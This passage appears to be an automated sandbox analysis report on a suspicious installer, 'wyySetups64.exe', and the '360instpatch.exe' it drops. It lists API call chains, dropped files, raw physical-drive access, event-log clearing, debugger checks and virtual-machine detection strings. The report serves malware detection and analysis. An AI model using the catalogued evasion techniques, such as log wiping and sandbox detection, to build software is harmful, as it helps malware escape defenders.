    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d9_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81BEB
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\Downloads\360instpatch.exeJump to dropped file
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\AppData\Roaming\wyySetups64.exeJump to dropped file
    Source: C:\Users\user\Desktop\wyySetups64.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\360instpatch[1].exeJump to dropped file
    Source: C:\Users\user\Downloads\360instpatch.exeFile created: C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dllJump to dropped file
    Source: C:\Users\user\Downloads\360instpatch.exeFile created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllJump to dropped file
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B7DA24 GetPrivateProfileStringW,8_2_00B7DA24
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B49A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,8_2_00B49A0C
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF0FE46 GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,GetPrivateProfileIntW,GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,_memset,_wcslen,_memset,inet_addr,inet_addr,_wcslen,__wcslwr,wsprintfW,8_2_6BF0FE46
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B7DA24 GetPrivateProfileStringW,9_2_00B7DA24
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B49A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,9_2_00B49A0C

    Boot Survival

    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d8_2_00B81BEB
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d8_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BF52940
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF523F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d8_2_6BF527B0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE46C9
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d8_2_6BEE4660
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B82158
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B92210
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d9_2_00B925D0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B166F0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B92760
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B16759
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d9_2_00B268A0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d9_2_00B26AE0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B818BD
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81A51
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d9_2_00B81BEB

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_00B6A4F6 __EH_prolog3,IsIconic,ShowWindow,8_2_00B6A4F6
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_00B46727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,8_2_00B46727
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_00B45C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,8_2_00B45C31
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 9_2_00B46727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,9_2_00B46727
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 9_2_00B45C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,9_2_00B45C31
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Code function: 1_2_0337B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,1_2_0337B3C0
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_00B35706 __EH_prolog3,_memset,GetWindowsDirectoryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00B35706
    Source: C:\Users\user\Downloads\360instpatch.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\LiveUpdate360
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
    Source: C:\Users\user\Desktop\wyySetups64.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\wyySetups64.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Downloads\360instpatch.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Downloads\360instpatch.exe Code function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,8_2_00B68A46
    Source: C:\Users\user\Downloads\360instpatch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID='Disk #0, Partition #1'} where ResultClass = Win32_DiskDrive
    Source: C:\Users\user\Downloads\360instpatch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
    Source: C:\Users\user\Downloads\360instpatch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='C:'} where ResultClass = Win32_DiskPartition
    Source: C:\Users\user\Downloads\360instpatch.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: 8_2_6BEFAC4D rdtsc 8_2_6BEFAC4D
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,8_2_00B567A4
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,8_2_00B788EB
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,8_2_00B24BD0
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: GetAdaptersInfo,GetTickCount,_sprintf,8_2_6BEFA873
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: GetAdaptersInfo,GetAdaptersInfo,9_2_00B567A4
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: GetAdaptersInfo,GetAdaptersInfo,9_2_00B788EB
    Source: C:\Users\user\Downloads\360instpatch.exe Code function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,9_2_00B24BD0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Window / User API: threadDelayed 1495
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Window / User API: threadDelayed 3452
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Window / User API: threadDelayed 4063
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5197
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1647
    Source: C:\Users\user\Downloads\360instpatch.exe Window / User API: threadDelayed 9792
    Source: C:\Users\user\Desktop\wyySetups64.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-11249
    Source: C:\Users\user\Downloads\360instpatch.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{DFE14265-3905-4689-9143-1E1473933304}.tmp\360P2SP.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Evasive API call chain: RegQueryValue,DecisionNodes,Sleep graph_1-44017
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_1-44016
    Source: C:\Users\user\Downloads\360instpatch.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
    Source: C:\Users\user\Downloads\360instpatch.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_8-147620
    Source: C:\Users\user\Downloads\360instpatch.exe API coverage: 0.7 %
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 1368 Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 6120 Thread sleep time: -1495000s >= -30000s
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 4504 Thread sleep time: -34520s >= -30000s
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe TID: 6120 Thread sleep time: -4063000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep count: 5197 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480 Thread sleep count: 1647 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7080 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368 Thread sleep count: 307 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Downloads\360instpatch.exe TID: 792 Thread sleep time: -217500s >= -30000s
    Source: C:\Users\user\Downloads\360instpatch.exe TID: 792 Thread sleep time: -14688000s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 5064 Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 6772 Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Downloads\360instpatch.exe File opened: PhysicalDrive0
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Thread sleep count: Count: 3452 delay: -10
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,8_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00B73FB0
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF3A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,8_2_6BF3A6BA
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6CD3E2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,8_2_6CD3E2B7
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B7D670 _memset,FindFirstFileW,FindNextFileW,FindClose,9_2_00B7D670
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B6D71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,9_2_00B6D71E
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 9_2_00B73FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,9_2_00B73FB0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_033780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_033780F0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03375430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,1_2_03375430
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Thread delayed: delay time: 30000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
    Source: 360instpatch.exe.0.drBinary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
    Source: wyySetups64.exe, 00000000.00000002.1810189166.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
    Source: wyySetups64.exe, 00000000.00000002.1810189166.00000000007B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
    Source: wyySetups64.exe, 00000000.00000002.1810189166.0000000000821000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 360instpatch.exe, 00000008.00000002.4115869359.0000000001609000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3462473885.000001A6AFC5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3461758605.000001A6AA62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 360instpatch.exe, 00000008.00000003.1844261692.0000000003222000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
    Source: wyySetups64.exe, 00000001.00000002.4115270099.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeAPI call chain: ExitProcess graph end nodegraph_1-43540
    Source: C:\Users\user\Downloads\360instpatch.exeAPI call chain: ExitProcess graph end nodegraph_8-148112
    Source: C:\Users\user\Desktop\wyySetups64.exe Process information queried: ProcessInformation
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BEFAC4D rdtsc 8_2_6BEFAC4D
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1001124D
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B19CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,8_2_00B19CD0
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0338054D VirtualProtect ?,-00000001,00000104,?1_2_0338054D
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,0_2_10001170
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D50AE4 mov eax, dword ptr fs:[00000030h]0_2_00D50AE4
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00B20AE4 mov eax, dword ptr fs:[00000030h]1_2_00B20AE4
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_031F00CD mov eax, dword ptr fs:[00000030h]1_2_031F00CD
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,1_2_03376790
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exe Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1001154A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1001154A
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1001124D
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D61520 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D61520
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D61521 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D61521
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,1_2_0337DF10
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_0337F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0337F00A
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03381F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_03381F67
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD6815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00BD6815
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_00BD8587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD8587
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B9A44A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00B9A44A
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B94647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00B94647
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B9116F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00B9116F
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B918F6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00B918F6
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF38207 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6BF38207
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF384D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6BF384D6
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF47A51 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6BF47A51
